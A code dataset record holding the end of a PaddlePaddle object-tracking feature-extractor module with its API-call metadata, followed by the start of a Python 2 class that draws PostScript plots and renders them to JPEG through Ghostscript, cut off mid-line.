self.iounet_features def dim(self): return TensorList([self.layer_dim[l] for l in self.output_layers]) def stride(self): return TensorList([ s * self.layer_stride[l] for l, s in zip(self.output_layers, self.pool_stride) ]) def extract(self, im: np.ndarray, debug_save_name=None): with fluid.dygraph.guard(): if debug_save_name is not None: np.savez(debug_save_name, im) im = im / 255. # don't use im /= 255. since we don't want to alter the input im -= self.mean im /= self.std im = n2p(im) output_features = self.net.extract_features(im, self.feature_layers) # Store the raw resnet features which are input to iounet iounet_backbone_features = TensorList([ output_features[layer] for layer in self.iounet_feature_layers ]) self.iounet_backbone_features = iounet_backbone_features.numpy() # Store the processed features from iounet, just before pooling self.iounet_features = TensorList([ f.numpy() for f in self.iou_predictor.get_iou_feat( iounet_backbone_features) ]) output = TensorList([ output_features[layer].numpy() for layer in self.output_layers ]) return output class SFCAlexnet(MultiFeatureBase): """Alexnet feature. args: output_layers: List of layers to output. net_path: Relative or absolute net path (default should be fine). use_gpu: Use GPU or CPU. """ def __init__(self, output_layers=('conv5', ), net_path='estimator', use_gpu=True, *args, **kwargs): super().__init__(*args, **kwargs) self.output_layers = list(output_layers) self.use_gpu = use_gpu self.net_path = net_path def initialize(self): with fluid.dygraph.guard(): if os.path.isabs(self.net_path): net_path_full = self.net_path else: net_path_full = os.path.join(env_settings().network_path, self.net_path) self.net = siamfc_alexnet( backbone_pretrained=False, backbone_is_test=True, estimator_is_test=True) state_dictsm, _ = fluid.load_dygraph(net_path_full) self.net.load_dict(state_dictsm) self.net.train() self.target_estimator = self.net.target_estimator self.layer_stride = {'conv5': 8} self.layer_dim = {'conv5': 256} self.estimator_feature_layers = self.net.target_estimator_layer if isinstance(self.pool_stride, int) and self.pool_stride == 1: self.pool_stride = [1] * len(self.output_layers) self.feature_layers = sorted( list(set(self.output_layers + self.estimator_feature_layers))) self.mean = np.reshape([0., 0., 0.], [1, -1, 1, 1]) self.std = np.reshape([1 / 255., 1 / 255., 1 / 255.], [1, -1, 1, 1]) def free_memory(self): if hasattr(self, 'net'): del self.net if hasattr(self, 'target_estimator'): del self.target_estimator if hasattr(self, 'estimator_backbone_features'): del self.estimator_backbone_features def dim(self): return TensorList([self.layer_dim[l] for l in self.output_layers]) def stride(self): return TensorList([ s * self.layer_stride[l] for l, s in zip(self.output_layers, self.pool_stride) ]) def extract(self, im: np.ndarray, debug_save_name=None): with fluid.dygraph.guard(): if debug_save_name is not None: np.savez(debug_save_name, im) im = im / 255. # don't use im /= 255. since we don't want to alter the input im -= self.mean im /= self.std im = n2p(im) output_features = self.net.extract_features(im, self.feature_layers) # Store the raw backbone features which are input to estimator estimator_backbone_features = TensorList([ output_features[layer] for layer in self.estimator_feature_layers ]) self.estimator_backbone_features = estimator_backbone_features.numpy( ) output = TensorList([ output_features[layer].numpy() for layer in self.output_layers ]) return output class SRPNAlexNet(MultiFeatureBase): """Alexnet feature. args: output_layers: List of layers to output. net_path: Relative or absolute net path (default should be fine). use_gpu: Use GPU or CPU. """ def __init__(self, net_path='estimator', use_gpu=True, *args, **kwargs): super().__init__(*args, **kwargs) self.use_gpu = use_gpu self.net_path = net_path def initialize(self): with fluid.dygraph.guard(): if os.path.isabs(self.net_path): net_path_full = self.net_path else: net_path_full = os.path.join(env_settings().network_path, self.net_path) self.net = SiamRPN_AlexNet(backbone_pretrained=False, is_test=True) state_dict, _ = fluid.load_dygraph(net_path_full) self.net.load_dict(state_dict) self.net.eval() def free_memory(self): if hasattr(self, 'net'): del self.net def extract(self, im: np.ndarray, debug_save_name=None): with fluid.dygraph.guard(): if debug_save_name is not None: np.savez(debug_save_name, im) im = n2p(im) output_features = self.net.extract_backbone_features(im) # Store the raw backbone features which are input to estimator output = TensorList([layer.numpy() for layer in output_features]) return output class SMaskResNet50_base(MultiFeatureBase): """Resnet50-dilated feature. args: output_layers: List of layers to output. net_path: Relative or absolute net path (default should be fine). use_gpu: Use GPU or CPU. """ def __init__(self, net_path='estimator', use_gpu=True, *args, **kwargs): super().__init__(*args, **kwargs) self.use_gpu = use_gpu self.net_path = net_path def initialize(self): with fluid.dygraph.guard(): if os.path.isabs(self.net_path): net_path_full = self.net_path else: net_path_full = os.path.join(env_settings().network_path, self.net_path) self.net = SiamMask_ResNet50_base(backbone_pretrained=False, is_test=True) state_dict, _ = fluid.load_dygraph(net_path_full) self.net.load_dict(state_dict) self.net.eval() def free_memory(self): if hasattr(self, 'net'): del self.net def extract(self, im: np.ndarray, debug_save_name=None): with fluid.dygraph.guard(): if debug_save_name is not None: np.savez(debug_save_name, im) im = n2p(im) output_features = self.net.extract_backbone_features(im) # Store the raw backbone features which are input to estimator output = TensorList([layer.numpy() for layer in output_features]) return output class SMaskResNet50_sharp(MultiFeatureBase): """Resnet50-dilated feature. args: output_layers: List of layers to output. net_path: Relative or absolute net path (default should be fine). use_gpu: Use GPU or CPU. """ def __init__(self, net_path='estimator', use_gpu=True, *args, **kwargs): super().__init__(*args, **kwargs) self.use_gpu = use_gpu self.net_path = net_path def initialize(self): with fluid.dygraph.guard(): if os.path.isabs(self.net_path): net_path_full = self.net_path else: net_path_full = os.path.join(env_settings().network_path, self.net_path) self.net = SiamMask_ResNet50_sharp(backbone_pretrained=False, is_test=True) state_dict, _ = fluid.load_dygraph(net_path_full) self.net.load_dict(state_dict) self.net.eval() def free_memory(self): if hasattr(self, 'net'): del self.net def extract(self, im: np.ndarray, debug_save_name=None): with fluid.dygraph.guard(): if debug_save_name is not None: np.savez(debug_save_name, im) im = n2p(im) output_features = self.net.extract_backbone_features(im) # Store the raw backbone features which are input to estimator output = TensorList([layer.numpy() for layer in output_features]) return output
[((83, 20, 83, 68), 'numpy.reshape', 'np.reshape', ({(83, 31, 83, 52): '[0.485, 0.456, 0.406]', (83, 54, 83, 67): '[1, -1, 1, 1]'}, {}), '([0.485, 0.456, 0.406], [1, -1, 1, 1])', True, 'import numpy as np\n'), ((84, 19, 84, 67), 'numpy.reshape', 'np.reshape', ({(84, 30, 84, 51): '[0.229, 0.224, 0.225]', (84, 53, 84, 66): '[1, -1, 1, 1]'}, {}), '([0.229, 0.224, 0.225], [1, -1, 1, 1])', True, 'import numpy as np\n'), ((97, 15, 97, 74), 'pytracking.libs.TensorList', 'TensorList', ({(97, 26, 97, 73): '[self.layer_dim[l] for l in self.output_layers]'}, {}), '([self.layer_dim[l] for l in self.output_layers])', False, 'from pytracking.libs import TensorList\n'), ((204, 20, 204, 68), 'numpy.reshape', 'np.reshape', ({(204, 31, 204, 52): '[0.485, 0.456, 0.406]', (204, 54, 204, 67): '[1, -1, 1, 1]'}, {}), '([0.485, 0.456, 0.406], [1, -1, 1, 1])', True, 'import numpy as np\n'), ((205, 19, 205, 67), 'numpy.reshape', 'np.reshape', ({(205, 30, 205, 51): '[0.229, 0.224, 0.225]', (205, 53, 205, 66): '[1, -1, 1, 1]'}, {}), '([0.229, 0.224, 0.225], [1, -1, 1, 1])', True, 'import numpy as np\n'), ((218, 15, 218, 74), 'pytracking.libs.TensorList', 'TensorList', ({(218, 26, 218, 73): '[self.layer_dim[l] for l in self.output_layers]'}, {}), '([self.layer_dim[l] for l in self.output_layers])', False, 'from pytracking.libs import TensorList\n'), ((307, 20, 307, 59), 'numpy.reshape', 'np.reshape', ({(307, 31, 307, 43): '[0.0, 0.0, 0.0]', (307, 45, 307, 58): '[1, -1, 1, 1]'}, {}), '([0.0, 0.0, 0.0], [1, -1, 1, 1])', True, 'import numpy as np\n'), ((308, 19, 308, 76), 'numpy.reshape', 'np.reshape', ({(308, 30, 308, 60): '[1 / 255.0, 1 / 255.0, 1 / 255.0]', (308, 62, 308, 75): '[1, -1, 1, 1]'}, {}), '([1 / 255.0, 1 / 255.0, 1 / 255.0], [1, -1, 1, 1])', True, 'import numpy as np\n'), ((319, 15, 319, 74), 'pytracking.libs.TensorList', 'TensorList', ({(319, 26, 319, 73): '[self.layer_dim[l] for l in self.output_layers]'}, {}), '([self.layer_dim[l] for l in self.output_layers])', False, 'from pytracking.libs import TensorList\n'), ((36, 13, 36, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((37, 15, 37, 43), 'os.path.isabs', 'os.path.isabs', ({(37, 29, 37, 42): 'self.net_path'}, {}), '(self.net_path)', False, 'import os\n'), ((43, 23, 46, 36), 'ltr.models.bbreg.atom.atom_resnet18', 'atom_resnet18', (), '', False, 'from ltr.models.bbreg.atom import atom_resnet50, atom_resnet18\n'), ((48, 30, 48, 63), 'paddle.fluid.load_dygraph', 'fluid.load_dygraph', ({(48, 49, 48, 62): 'net_path_full'}, {}), '(net_path_full)', False, 'from paddle import fluid\n'), ((106, 13, 106, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((113, 17, 113, 24), 'pytracking.libs.paddle_utils.n2p', 'n2p', ({(113, 21, 113, 23): 'im'}, {}), '(im)', False, 'from pytracking.libs.paddle_utils import n2p\n'), ((118, 39, 120, 14), 'pytracking.libs.TensorList', 'TensorList', ({(118, 50, 120, 13): '[output_features[layer] for layer in self.iounet_feature_layers]'}, {}), '([output_features[layer] for layer in self.iounet_feature_layers])', False, 'from pytracking.libs import TensorList\n'), ((157, 13, 157, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((158, 15, 158, 43), 'os.path.isabs', 'os.path.isabs', ({(158, 29, 158, 42): 'self.net_path'}, {}), '(self.net_path)', False, 'import os\n'), ((164, 23, 167, 36), 'ltr.models.bbreg.atom.atom_resnet50', 'atom_resnet50', (), '', False, 'from ltr.models.bbreg.atom import atom_resnet50, atom_resnet18\n'), ((169, 30, 169, 63), 'paddle.fluid.load_dygraph', 'fluid.load_dygraph', ({(169, 49, 169, 62): 'net_path_full'}, {}), '(net_path_full)', False, 'from paddle import fluid\n'), ((227, 13, 227, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((234, 17, 234, 24), 'pytracking.libs.paddle_utils.n2p', 'n2p', ({(234, 21, 234, 23): 'im'}, {}), '(im)', False, 'from pytracking.libs.paddle_utils import n2p\n'), ((239, 39, 241, 14), 'pytracking.libs.TensorList', 'TensorList', ({(239, 50, 241, 13): '[output_features[layer] for layer in self.iounet_feature_layers]'}, {}), '([output_features[layer] for layer in self.iounet_feature_layers])', False, 'from pytracking.libs import TensorList\n'), ((278, 13, 278, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((279, 15, 279, 43), 'os.path.isabs', 'os.path.isabs', ({(279, 29, 279, 42): 'self.net_path'}, {}), '(self.net_path)', False, 'import os\n'), ((285, 23, 288, 39), 'ltr.models.siamese.siam.siamfc_alexnet', 'siamfc_alexnet', (), '', False, 'from ltr.models.siamese.siam import siamfc_alexnet\n'), ((290, 30, 290, 63), 'paddle.fluid.load_dygraph', 'fluid.load_dygraph', ({(290, 49, 290, 62): 'net_path_full'}, {}), '(net_path_full)', False, 'from paddle import fluid\n'), ((328, 13, 328, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((335, 17, 335, 24), 'pytracking.libs.paddle_utils.n2p', 'n2p', ({(335, 21, 335, 23): 'im'}, {}), '(im)', False, 'from pytracking.libs.paddle_utils import n2p\n'), ((340, 42, 343, 14), 'pytracking.libs.TensorList', 'TensorList', ({(340, 53, 343, 13): '[output_features[layer] for layer in self.estimator_feature_layers]'}, {}), '([output_features[layer] for layer in self.estimator_feature_layers])', False, 'from pytracking.libs import TensorList\n'), ((371, 13, 371, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((372, 15, 372, 43), 'os.path.isabs', 'os.path.isabs', ({(372, 29, 372, 42): 'self.net_path'}, {}), '(self.net_path)', False, 'import os\n'), ((377, 23, 377, 79), 'ltr.models.siam.siam.SiamRPN_AlexNet', 'SiamRPN_AlexNet', (), '', False, 'from ltr.models.siam.siam import SiamRPN_AlexNet, SiamMask_ResNet50_sharp, SiamMask_ResNet50_base\n'), ((379, 28, 379, 61), 'paddle.fluid.load_dygraph', 'fluid.load_dygraph', ({(379, 47, 379, 60): 'net_path_full'}, {}), '(net_path_full)', False, 'from paddle import fluid\n'), ((388, 13, 388, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((392, 17, 392, 24), 'pytracking.libs.paddle_utils.n2p', 'n2p', ({(392, 21, 392, 23): 'im'}, {}), '(im)', False, 'from pytracking.libs.paddle_utils import n2p\n'), ((419, 13, 419, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((420, 15, 420, 43), 'os.path.isabs', 'os.path.isabs', ({(420, 29, 420, 42): 'self.net_path'}, {}), '(self.net_path)', False, 'import os\n'), ((425, 23, 425, 86), 'ltr.models.siam.siam.SiamMask_ResNet50_base', 'SiamMask_ResNet50_base', (), '', False, 'from ltr.models.siam.siam import SiamRPN_AlexNet, SiamMask_ResNet50_sharp, SiamMask_ResNet50_base\n'), ((427, 28, 427, 61), 'paddle.fluid.load_dygraph', 'fluid.load_dygraph', ({(427, 47, 427, 60): 'net_path_full'}, {}), '(net_path_full)', False, 'from paddle import fluid\n'), ((436, 13, 436, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((440, 17, 440, 24), 'pytracking.libs.paddle_utils.n2p', 'n2p', ({(440, 21, 440, 23): 'im'}, {}), '(im)', False, 'from pytracking.libs.paddle_utils import n2p\n'), ((467, 13, 467, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((468, 15, 468, 43), 'os.path.isabs', 'os.path.isabs', ({(468, 29, 468, 42): 'self.net_path'}, {}), '(self.net_path)', False, 'import os\n'), ((473, 23, 473, 87), 'ltr.models.siam.siam.SiamMask_ResNet50_sharp', 'SiamMask_ResNet50_sharp', (), '', False, 'from ltr.models.siam.siam import SiamRPN_AlexNet, SiamMask_ResNet50_sharp, SiamMask_ResNet50_base\n'), ((475, 28, 475, 61), 'paddle.fluid.load_dygraph', 'fluid.load_dygraph', ({(475, 47, 475, 60): 'net_path_full'}, {}), '(net_path_full)', False, 'from paddle import fluid\n'), ((484, 13, 484, 34), 'paddle.fluid.dygraph.guard', 'fluid.dygraph.guard', ({}, {}), '()', False, 'from paddle import fluid\n'), ((488, 17, 488, 24), 'pytracking.libs.paddle_utils.n2p', 'n2p', ({(488, 21, 488, 23): 'im'}, {}), '(im)', False, 'from pytracking.libs.paddle_utils import n2p\n'), ((108, 16, 108, 45), 'numpy.savez', 'np.savez', ({(108, 25, 108, 40): 'debug_save_name', (108, 42, 108, 44): 'im'}, {}), '(debug_save_name, im)', True, 'import numpy as np\n'), ((229, 16, 229, 45), 'numpy.savez', 'np.savez', ({(229, 25, 229, 40): 'debug_save_name', (229, 42, 229, 44): 'im'}, {}), '(debug_save_name, im)', True, 'import numpy as np\n'), ((330, 16, 330, 45), 'numpy.savez', 'np.savez', ({(330, 25, 330, 40): 'debug_save_name', (330, 42, 330, 44): 'im'}, {}), '(debug_save_name, im)', True, 'import numpy as np\n'), ((390, 16, 390, 45), 'numpy.savez', 'np.savez', ({(390, 25, 390, 40): 'debug_save_name', (390, 42, 390, 44): 'im'}, {}), '(debug_save_name, im)', True, 'import numpy as np\n'), ((438, 16, 438, 45), 'numpy.savez', 'np.savez', ({(438, 25, 438, 40): 'debug_save_name', (438, 42, 438, 44): 'im'}, {}), '(debug_save_name, im)', True, 'import numpy as np\n'), ((486, 16, 486, 45), 'numpy.savez', 'np.savez', ({(486, 25, 486, 40): 'debug_save_name', (486, 42, 486, 44): 'im'}, {}), '(debug_save_name, im)', True, 'import numpy as np\n'), ((40, 45, 40, 59), 'pytracking.admin.environment.env_settings', 'env_settings', ({}, {}), '()', False, 'from pytracking.admin.environment import env_settings\n'), ((161, 45, 161, 59), 'pytracking.admin.environment.env_settings', 'env_settings', ({}, {}), '()', False, 'from pytracking.admin.environment import env_settings\n'), ((282, 45, 282, 59), 'pytracking.admin.environment.env_settings', 'env_settings', ({}, {}), '()', False, 'from pytracking.admin.environment import env_settings\n'), ((375, 45, 375, 59), 'pytracking.admin.environment.env_settings', 'env_settings', ({}, {}), '()', False, 'from pytracking.admin.environment import env_settings\n'), ((423, 45, 423, 59), 'pytracking.admin.environment.env_settings', 'env_settings', ({}, {}), '()', False, 'from pytracking.admin.environment import env_settings\n'), ((471, 45, 471, 59), 'pytracking.admin.environment.env_settings', 'env_settings', ({}, {}), '()', False, 'from pytracking.admin.environment import env_settings\n')]
fakeNetflix/facebook-repo-fbkutils
netesto/local/psPlot.py
16ec0c024322c163e7dbe691812ba8fdf5b511ad
#!/usr/bin/env python2 import sys import random import os.path import shutil import commands import types import math #gsPath = '/usr/local/bin/gs' gsPath = 'gs' logFile = '/dev/null' #logFile = 'plot.log' #--- class PsPlot(fname, pageHeader, pageSubHeader, plotsPerPage) # class PsPlot(object): def __init__(self, fname, pageHeader, pageSubHeader, plotsPerPage): self.foutPath = os.path.dirname(fname)+'/' if self.foutPath == '/': self.foutPath = '' self.foutName = os.path.basename(fname) self.fname = fname+'.ps' self.pageHeader = pageHeader self.pageSubHeader = pageSubHeader self.plotsPerPage = plotsPerPage self.yfix1 = '' self.yfix2 = '' self.xGrid = 1 self.yGrid = 1 self.xUniform = False self.xLen = 6.5 #inches self.seriesTitle = ' ' self.x0 = 0 self.xInc = 0 self.xCount = 0 self.xList = [] self.xDict = {} self.y1Inc = 0 self.y1Count = 0 self.y1LogScale = 0 self.y2Inc = 0 self.y2Count = 0 self.y2LogScale = 0 self.xOffset = 0 self.colors = [ (0.7,0.7,0.7), (0,0,0.8), (0.8,0,0), (0.42,0.55,0.14), (0.6,0.5,0.3), (0.6,0.2,0.8), (0,0.8,0), (0.4,0.3,0.5), (0.5,0.5,0.5), (0.8,0.0,0.0), (0,0,0) ] self.colorsN = 11 self.colorRed = (0.8,0,0) self.colorGreen = (0,0.8,0) self.colorBlue = (0,0,0.8) self.colorAqua = (0,0.5,0.5) self.colorWhite = (1,1,1) self.ColorBlack = (0,0,0) self.xSize = 1800 self.ySize = 900 shutil.copy('plot-header.ps', self.fname) self.fout = open(self.fname, 'a') self.flog = open(logFile, 'a') # self.flog = open('./psPlot.out', 'a') if plotsPerPage == 4: print >>self.fout, '/doGraph { graph4v } def' print >>self.fout, '/nextGraph { nextGraph4v } def' elif plotsPerPage == 3: print >>self.fout, '/doGraph { graph3v } def' print >>self.fout, '/nextGraph { nextGraph3v } def' elif plotsPerPage == 2: print >>self.fout, '/doGraph { graph2v } def' print >>self.fout, '/nextGraph { nextGraph2v } def' else: print >>self.fout, '/doGraph { graph1v } def' print >>self.fout, '/nextGraph { nextGraph1v } def' print >>self.fout, '/showpage {\n 40 742 moveto' print >>self.fout, '/Helvetica findfont 12 scalefont setfont' if self.pageHeader != '': print >>self.fout, '(',self.pageHeader,') show' if self.pageSubHeader != '': print >>self.fout, '40 726 moveto\n (',self.pageSubHeader,') show' print >>self.fout, 'showpage\n} bind def' print >>self.fout, 'doGraph' #--- End() # def End(self): print >>self.fout, '\nshowpage\nend' self.fout.close() #--- GetInc(vMin, vMax) def GetInc(self,vMin, vMax): ff = 1.0 while vMax <= 1 and vMax > 0: ff *= 0.10 vMin *= 10 vMax *= 10 v0 = int(vMin) v1 = int(vMax+0.99) f = 1 w = v1 - v0 if w == 0: v1 = v0 + 1 w = 1 while w/f >= 100: f *= 10 # w = int(w/f) v0 = int(v0/f) v1 = int(v1/f) if (vMin % f) != 0 and vMax == v1: v1 += 1 w = v1 - v0 if w <= 10: vInc = 1 elif w <= 20: vInc = 2 else: m = 10 while w/m > 100: m *= 10 if (v0 >= 0) and (v0 % m) != 0: v0 = int(v0 / m) * m if (v1 % m) != 0: v1 = int(v1 / m) * m + m w = v1 - v0 if w <= 5*m: vInc = m/2 else: vInc = m else: vInc = m # if (vMax/f)%vInc != 0 or v1 % vInc != 0: if v1 % vInc != 0: v1 = int(v1/vInc)*vInc + vInc if (v0 % vInc) != 0: v0 = int(v0/vInc)*vInc v0 += vInc v0 *= (f*ff) v1 *= (f*ff) vInc *= (f*ff) return v0, v1, vInc #--- ValueConvert(v) # def ValueConvert(self, v, inc): if inc > 0: logInc = int(math.log10(v/inc)) d = math.pow(10,logInc) if d == 0: d = 10.0 else: d = 10.0 if d == 1 and float(v)/inc > 1.0: d = 10.0 if v >= 1000000000 and inc > 1: s = int(v/(1000000000/d))/d if s*d == int(s)*d: s = int(s) r = str(s) + 'G' elif v >= 1000000 and inc > 1: s = int(v/(1000000/d))/d if s*d == int(s)*d: s = int(s) r = str(s) + 'M' elif v >= 1000 and inc > 1: s = int(v/(1000/d))/d if s*d == int(s)*d: s = int(s) r = str(s) + 'K' elif v >= 1: s = int(v*d)/d if s*d == int(s)*d: s = int(s) r = str(s) else: r = str(int(v*100)/100.0) return r #--- GetAxis(vBeg, vEnd, vInc, logFlag) # def GetAxis(self, vBeg, vEnd, vInc, logFlag): fix = '{ 0 add }' if isinstance(vBeg,list): vList = vBeg vList.append(' ') self.xUniform = True v0 = 1 v1 = len(vList) vi = 1 fix = '{ '+str(v0-vi)+' sub '+str(vi)+' div }' logFlag = 0 else: if vInc == 0: v0,v1,vi = self.GetInc(vBeg,vEnd) else: v0 = vBeg v1 = vEnd vi = vInc if vBeg > 0 and (logFlag==1 or (logFlag==0 and (vEnd/vBeg > 100))): v0 = vBeg v1 = vEnd logFlag = 1 v0Log = math.log10(v0) t = math.ceil(v0Log) ff = math.modf(v0Log) if math.fabs(ff[0]) < math.fabs(v0Log)/1000 and t < 0: t += 1 logOffset = 0 while t < 1: logOffset += 1 t += 1 v0 = math.pow(10,math.floor(v0Log)+1) v1 = math.pow(10,math.ceil(math.log10(v1))) vi = 1 vList = [] v = v0 while v <= v1: vList.append(self.ValueConvert(v,0)) v *= 10 if v0 > 1: logOffset -= (math.log10(v0) - 1) # substract 1 from above inside parent? fix = '{ dup 0 eq { } { log '+str(logOffset)+' add } ifelse }' else: logFlag = 0 v = v0 vList = [] n = 0 while True: vList.append(self.ValueConvert(v,vi)) if v > vEnd: break n += 1 v = v0 + n*vi fix = '{ '+str(v0-vi)+' sub '+str(vi)+' div }' print >>self.flog, 'v0:',v0,' vi:',vi,' v1:',v1,' (',vEnd,')' print >>self.flog, 'vList: ', vList print >>self.flog, 'logFlag: ', logFlag, ' fix: ', fix return v0,v1,vi,vList,fix,logFlag #--- SetXLen(xlen) def SetXLen(self, xlen): self.xLen = xlen print >>self.fout, '/xAxisLen %.2f def' % self.xLen print >>self.fout, 'doGraph' return #--- SetXSize(xsize) def SetXSize(self, xsize): self.xSize = xsize return #--- SetYSize(ysize) def SetYSize(self, ysize): self.ySize = ysize return #--- SetPlotBgLevel(level) # def SetPlotBgLevel(self,level): print >>self.fout, '/plotBgLevel ', level, 'def\n' return #--- SetPlotPercentDir(value) def SetPlotPercentDir(self,value): if value == 'Vertical': print >>self.fout, '/plotNumPercentDir 1 def\n' else: print >>self.fout, '/plotNumPercentDir 0 def\n' return #--- SetPlotYLogScale(axis,value) # def SetPlotYLogScale(self,axis,value): if value == 'Off': v = -1 elif value == 'On': v = 1 else: v = 0; if axis == 1: self.y1LogScale = v else: self.y2LogScale = v return #--- SetPlot(xbeg,xend,xinc,ybeg,yend,yinc,xtitle,ytitle,title) # def SetPlot(self,xbeg,xend,xinc,ybeg,yend,yinc,xtitle,ytitle,title): print >>self.fout, '\n\nnextGraph\n1 setlinewidth\n' (x0,x1,xi,xList,fix,logFlag) = self.GetAxis(xbeg,xend,xinc,0) self.x0 = x0 self.xInc = xi self.xCount = len(xList) self.xList = xList self.xDict = {} k = 1 for x in xList: self.xDict[x] = k k=k+1 print >>self.fout, '/xfix ', fix, ' def\n' (y0,y1,yi,yList,fix,logFlag) = self.GetAxis(ybeg,yend,yinc, self.y1LogScale) self.y1Inc = yi self.y1Count = len(yList) self.yfix1 = '/yfix '+fix+' def\n /yinc yinc1 def' print >>self.fout, self.yfix1 print >>self.fout, '[ ' for x in xList: self.fout.write('('+str(x)+') ') self.fout.write(' ]\n[ ') for y in yList: self.fout.write('('+str(y)+') ') print >>self.fout, ' ]' print >>self.fout, '('+xtitle+')\n('+ytitle+')\naxes\n' print >>self.fout, self.xGrid, self.yGrid, ' grid\n' print >>self.fout, '/ymtitle ypos ylen add 10 add def\n' # Multiple lines in title are separated by '|' print >>self.flog, 'Main Title: '+title titleLines = title.split('|') for t in titleLines: if len(t) > 0: print >>self.flog, ' '+t print >>self.fout, '('+t+')\n' print >>self.fout, 'Mtitles\n' # print >>self.fout, '('+title+')\nMtitles\n' if logFlag == 1: print >>self.fout, 'beginFunction\n' for ys in yList: factor = 1 if ys[-1:] == 'K': yss = ys[:-1] factor = 1000 elif ys[-1:] == 'M': yss = ys[:-1] factor = 1000000 else: yss = ys y = float(yss)*factor/10.0 k = 2 while k < 10: print >>self.fout, 0, k*y k += 1 print >>self.fout, 'endFunction\n' print >>self.fout, '19 { 0 0 0 setrgbcolor } plotSymbolsC\n' return y1 #--- SetPlot2(xbeg,xend,xinc,ybeg,yend,yinc,zbeg,zend,zinc, # xtitle,ytitle,ztitle,title) # def SetPlot2(self,xbeg,xend,xinc,ybeg,yend,yinc,zbeg,zend,zinc, xtitle,ytitle,ztitle,title): rv = self.SetPlot(xbeg,xend,xinc,ybeg,yend,yinc,xtitle,ytitle,title) (z0,z1,zi,zList,fix,logFlag) = self.GetAxis(zbeg,zend,zinc,self.y2LogScale) self.y2Inc = zi self.y2Count = len(zList) print >>self.fout, '/Flag2Yaxes 1 def' self.yfix2 = '/yfix '+fix+' def\n/yinc yinc2 def' print >>self.fout, 'axpos axlen add aypos aylen' self.fout.write('[ ') for z in zList: self.fout.write('('+str(z)+') ') self.fout.write(' ]') if ztitle != '': print >>self.fout, '('+ztitle+') vaxis2' if logFlag == 1: print >>self.fout, self.yfix2 print >>self.fout, 'beginFunction\n' for zs in zList: factor = 1 if zs[-1:] == 'K': zss = zs[:-1] factor = 1000 elif zs[-1:] == 'M': zss = zs[:-1] factor = 1000000 else: zss = zs y = float(zss)*factor/10.0 k = 2 while k < 10: print >>self.fout, self.xCount, k*y k += 1 print >>self.fout, 'endFunction\n' print >>self.fout, '18 { 0.72 0.52 0.5 setrgbcolor } plotSymbolsC\n' return rv #--- SetColor(color) # def SetColor(self, color): rv = ' { '+str(color[0])+' '+str(color[1])+' '+str(color[2])+ \ ' setrgbcolor } ' return rv #--- GetColorIndx(indx) # def GetColorIndx(self, indx): color = self.colors[indx % self.colorsN] rv = ' { '+str(color[0])+' '+str(color[1])+' '+str(color[2])+ \ ' setrgbcolor } ' return rv #--- SetColorIndx(indx, r, g, b) # def SetColorIndx(self, indx, r, g, b): self.colors[indx][0] = r self.colors[indx][1] = g self.colors[indx][2] = b return rv #--- outputPS(string) # def outputPS(self, s): print >>self.fout, s #--- SeriesNames(names) # def SeriesNames(self, names): indx = len(names) - 1 if indx == 0: return print >>self.fout, '('+self.seriesTitle+')' while indx >= 0: if names[indx] != None: print >>self.fout, '('+names[indx]+') ' print >>self.fout, self.SetColor(self.colors[indx % self.colorsN]) indx -= 1 print >>self.fout, 'fdescriptionsC' #--- PlotVBars(xList, type) # def PlotVBars(self, xList, type): flog = self.flog print >>self.fout, self.yfix1 print >>self.fout, 'beginFunction\n' endFun = 'endFunction\n' indx = 0 for x in xList: if x == ' ' and indx == len(xList)-1: continue indx += 1 print >>self.fout, x, 0.0 if (indx != 0) and (indx % 1000) == 0: print >>self.fout, endFun+type+'\nbeginFunction\n' print >>self.fout, x print >>self.fout, endFun, type, '\n' return #--- PlotData(axis, xList, yList, zList, id, type) # def PlotData(self, axis, xList, yList, zList, id, type): flog = self.flog print >>flog, 'graph xList: ', self.xList, ' xList: ', xList, \ ' yList: ', yList print >>self.fout, '%\n% Plot '+id+'\n%\n' print >>self.fout, '/xfix { ', self.x0 - self.xInc - self.xOffset,' sub ', self.xInc, ' div ', 0.0,' add } def\n' if axis == 2: print >>self.fout, self.yfix2 elif axis == 1: print >>self.fout, self.yfix1 # else: # print >>self.fout, '/yfix { 0 add } def\n' print >>self.fout, 'beginFunction\n' if isinstance(zList,list): endFun = 'endFunctionW\n' else: endFun = 'endFunction\n' indx = 0 for x in xList: if x == ' ' and indx == len(xList)-1: continue if len(yList) <= indx: continue y = yList[indx] if isinstance(zList,list): if len(zList) <= indx: continue z = zList[indx] else: z = '' indx += 1 if self.xUniform == True: g_indx = self.xDict[x] print >>self.fout, g_indx, y, z else: print >>self.fout, x, y, z if (indx != 0) and (indx % 1000) == 0: print >>self.fout, endFun+type+'\nbeginFunction\n' if self.xUniform == True: print >>self.fout, g_indx, y, z else: print >>self.fout, x, y, z print >>self.fout, endFun, type, '\n' return #--- GetImage() # def GetImage(self): flog = self.flog print >>self.fout, 'showpage\n' self.fout.flush() os.fsync(self.fout) if self.plotsPerPage == 1: # size = ' -g1200x550 ' size = ' -g%dx%d ' % (self.xSize, self.ySize) xres = int(100 * self.xSize * 6.5 / (1200 * self.xLen)) yres = int(110 * self.ySize / 550) res = ' -r%dx%d ' % (xres, yres) cmdStr = gsPath + ' -sDEVICE=jpeg'+size+'-sOutputFile='+self.foutPath+self.foutName+'.jpg -dNOPAUSE '+ res +self.fname+' -c quit' # cmdStr = gsPath + ' 